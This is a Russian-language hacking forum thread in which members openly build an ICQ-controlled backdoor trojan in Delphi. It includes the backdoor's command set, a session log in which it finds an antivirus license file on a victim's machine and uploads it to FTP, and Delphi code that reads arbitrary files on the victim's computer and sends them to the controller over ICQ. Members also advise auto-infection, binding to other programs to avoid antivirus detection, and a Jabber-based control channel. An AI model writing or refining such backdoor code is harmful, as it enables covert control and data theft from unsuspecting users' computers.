|
Zumm
| |
| alex0097 | Дата: Понедельник, 01.11.2010, 07:38 | Сообщение # 1 |
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
| Написал вирус через который можно упрвлять компьютером удаленно. Но вот загвозка, что управляется через ICQ. Очень неудобно.
Управление через ICQ выглядит так:
комп (21:55:29 31/10/2010)
Вошел в систему.
Zumm (21:55:49 31/10/2010)
/help
комп (21:55:49 31/10/2010)
/exit - выход
/shutdown - выключить машину
/download [ссылка];[путь] - скачать файл
/upload [путь];[имя] - отправить файл на FTP
/start [путь]; - запустить файл
/delete [путь]; - удалть файл
/changeicq [номер];[пароль] - сменить ICQ
/changepos [локация]; - сменить локацию
/changeid [метка]; - сменить метку машины
/find [файл];[корень] - найти файлы
/msg [текст сообщения]; - отправить сообщение
/report - доложить обстановку
/help - получить справку
Zumm (21:56:18 31/10/2010)
/find [*.lic];[]
комп (21:56:20 31/10/2010)
Начинаю поиск информации.
комп (21:56:23 31/10/2010)
C:\Documents and Settings\Administrator\Desktop\nod32.lic
C:\Program Files\ESET\ESET NOD32 Antivirus\License\NOD14E8.lic
комп (21:56:23 31/10/2010)
Поиск завершен.
Zumm (21:56:45 31/10/2010)
/upload [C:\Program Files\ESET\ESET NOD32 Antivirus\License\NOD14E8.lic];[NOD14E8.lic]
комп (21:56:46 31/10/2010)
Начинаю отправку файла.
комп (21:56:48 31/10/2010)
Файл отправлен.
Zumm (21:57:10 31/10/2010)
/start [C:\WINDOWS\system32\calc.exe]
комп (21:57:11 31/10/2010)
Запускаю файл.
комп (21:57:12 31/10/2010)
Файл запущен.
Может быть кто нить посоветую что можно использовать для основы? т.к управлять машиной удаленно неудобно через ICQ.
|
| |
| |
| cool1 | Дата: Понедельник, 01.11.2010, 08:13 | Сообщение # 2 |
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
| дай сорец посмотрю
За помощь ставьте +!
|
| |
| |
| vvova15 | Дата: Пятница, 15.04.2011, 17:46 | Сообщение # 3 |
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
| напиши клиент и визуализируй управление.
к примеру:
Code
//парсим сообщение о входе
procedure icqlcientmessagerecv(uin,msg:string,sender:tobject)
begin
if msg='вошел в систему' then memo1.lines.add(timetostr(time)+': '+'юзер вошел в систему');
end;
//посылаем команду, напимер удалить файл. путь к файлу проведен через edit1
procedure delbutonclick(sender:tobject)
begin
icqlcient1.sendmessage('delete '+edit1.text);
memo1.lines.add(timetostr(time)+': '+' файл '+edit1.text+' удален');
end;
и так далее...
и перед этим протокол не мешало бы привести к единому стандарту. к примеру:
клиент посылает:
команда|параметр1|параметр2|параметр3|...
а сервер в ответ
команда_ack|результат1|результат2|результат3|...
так будет удобнее добавлять новые команды и парсить сообщения об ответе
и если требуется многозадачное управление то добавить seq(уникальное число - номер команды)
тогда клиент можно будет написать без проблем
ICQ 185-398
|
| |
| |
| BROVAR | Дата: Четверг, 26.05.2011, 18:09 | Сообщение # 4 |
Был не раз
Зарегистрирован: 03.05.2011
Группа: Пользователи
Сообщений: 9
Статус: Offline
| Вообще управление по принципу ICQ-бота отличная идея. Надо будет и самому посидеть над таким.
Абара!
|
| |
| |
| dolphin | Дата: Пятница, 27.05.2011, 09:41 | Сообщение # 5 |
Администратор
Сообщений: 906
Статус: Offline
| Quote (cool1) Написал вирус через который можно упрвлять компьютером удаленно
Это уже бакдур
Есть тут http://delfcode.ru/load/soft/hak_soft/admin_icq_backdoor/3-1-0-513
Писалось с исходника в прикреплении.
Не соглашусь с автором, Тк щас большинство пользователей сидят за натом, ICQ как раз очень удобно на мой взгляд.
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
Сообщение отредактировал dolphin - Пятница, 27.05.2011, 09:46 |
| |
| |
| gravitas | Дата: Пятница, 27.05.2011, 16:53 | Сообщение # 6 |
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (dolphin) Не соглашусь с автором, Тк щас большинство пользователей сидят за натом, ICQ как раз очень удобно на мой взгляд.
Тема действительно актуальна. http://www.hackzone.ru/forum/open/id/16116/ - когда то с товарищем делали)
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| sk0rpi0n | Дата: Суббота, 28.05.2011, 14:03 | Сообщение # 7 |
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
| Хех, я сейчас тоже от делать нечего пишу Backdoor, через аську.Только как раз с тем самым визуальным оформлением.
Типа висит в окне программы управления поле editbox и рядом кнопка, такой вид подойдет для открытия и удаления файлов, работы с реестром удаленной машины, так же для вывода сообщения на экран.Остальное просто кнопками))
Но действтельно, через icq очень муторно, так как надо сначала добиться того, чтобы у жертвы появилсо програмко, который и будет принимать все команды от "управляющего" компа(Все, блин, боятся вирей, и не хотят ничего запускать))), и чтобы она нормально впилилась в систему, и все работало на ура. 
C++ - попса :D
Сообщение отредактировал sk0rpi0n - Суббота, 28.05.2011, 14:05 |
| |
| |
| XSPY | Дата: Суббота, 28.05.2011, 22:49 | Сообщение # 8 |
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 263
Статус: Offline
| так в чем проблема?
сделай мини-сервер в своем сервере-бекдоре,или накрайняк,при запуске сделай автозаражение и склеивание с прогами своего сервера.Конечно,тут главное не переборщить-проактивка спалит.
Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
|
| |
| |
| sk0rpi0n | Дата: Воскресенье, 29.05.2011, 12:04 | Сообщение # 9 |
|
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
| Я извиняюсь, что не по теме, но новую создавать, думаю, не зачем.
Я в своей дистанционной управлялке сделал открытие файла с компа жертвы в memo в моей проге в текстовом виде.
программа отправляет запрос /open <путь к файлу> , а backdoor в ответ отправляет строки из файла так /opened <строка из файла>
В самом баскдоре есть мемо, в который сначала сохраняются строки из файла, а потом отправляются.Так вот, главный вопрос - как сделать открытие файла из любой директории, а не только из папки backdoora?
Код:
Code procedure TForm1.ICQClient1MessageRecv(Sender: TObject; Msg, UIN: String);
var
i,hh:integer;
myFile : TextFile;
letter : char;
text : string;
begin
hh:=1;
if pos('/open', msg)>0 then begin // если в сообщении есть приставка /open, то погнали
Delete(msg,Pos('/open', msg),5); //очищаем сообщение от нее и получаем путь к файлу на компе
AssignFile(myFile, msg); //открываем его, присваиваем в переменную
while not Eof(myFile) do // пока не конец - считываем строки в встроенное memo.Вот тут вылетает ошибка, какая уже не помню....
begin
ReadLn(myFile, text); //читаем строку из файла
Memo1.Lines[hh]:=text; // присваиваем ее строке из memo
inc(hh); //делаем перенос строки в memo
end;
for i:=1 to memo1.Lines.Count do
Icqclient1.SendMessage(UIN,'/opened'+Memo1.Lines[i]); // отправляем построчно на uin
Дак вот этот код быдлокодерский и еще не работает, вообще не с какими файлами, прошу помощи
C++ - попса :D
Сообщение отредактировал sk0rpi0n - Воскресенье, 29.05.2011, 12:08 |
| |
| |
| gravitas | Дата: Воскресенье, 29.05.2011, 12:24 | Сообщение # 10 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Quote (sk0rpi0n) Delete(msg,Pos('/open', msg),5);
Code Memo1.Lines.LoadFromFile(msg);
Icqclient1.sendmessage(uin,memo1.text);
Quote (sk0rpi0n) for i:=1 to memo1.Lines.Count do
Icqclient1.SendMessage(UIN,'/opened'+Memo1.Lines[i]);
Ты флудер а не трой написал 
Quote (sk0rpi0n) Так вот, главный вопрос - как сделать открытие файла из любой директории, а не только из папки backdoora?
/open C:\file.txt
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| sk0rpi0n | Дата: Воскресенье, 29.05.2011, 12:28 | Сообщение # 11 |
|
Участник
Зарегистрирован: 28.05.2011
Группа: Пользователи
Сообщений: 65
Статус: Offline
| Quote Ты флудер а не трой написал
Ненене, флудер мы уже проходили))
А все присланные строки сохраняются в memo, и все получаетсямило и красиво
Щас проверю
UPD:Получилось, и даже текст пришел мне, но только я проверил из папки с прогой.А если я укажу путь там C:\Boot.ini?
Спасибо, все отлично работает!!
C++ - попса :D
Сообщение отредактировал sk0rpi0n - Воскресенье, 29.05.2011, 12:35 |
| |
| |
| gravitas | Дата: Воскресенье, 29.05.2011, 12:30 | Сообщение # 12 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Зачем так извращаться? Посылай 1 раз но все.
Ну проверь)
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| alex0097 | Дата: Суббота, 02.07.2011, 12:09 | Сообщение # 13 |
|
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
| Народ а вы не думали что лучше всего, это осуществлять через jabber, получится очень хороший jabber BackDoor Ведь jabber почти ни когда не вылетает. И есть много идей по поводу этого. Т.к можно базу сделать что бы для каждого компьютера он брал отдельный jabber
|
| |
| |
| dolphin | Дата: Понедельник, 04.07.2011, 13:46 | Сообщение # 14 |
|
Администратор
Сообщений: 906
Статус: Offline
| alex0097, есть компонент для Delphi под jabber?
Система: Windows 10 x64, Kali Linux
Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
| |
| alex0097 | Дата: Понедельник, 04.07.2011, 20:58 | Сообщение # 15 |
|
Частый гость
Зарегистрирован: 11.07.2010
Группа: Пользователи
Сообщений: 51
Статус: Offline
| dolphin да есть конечно.=)
|
| |
| |
|
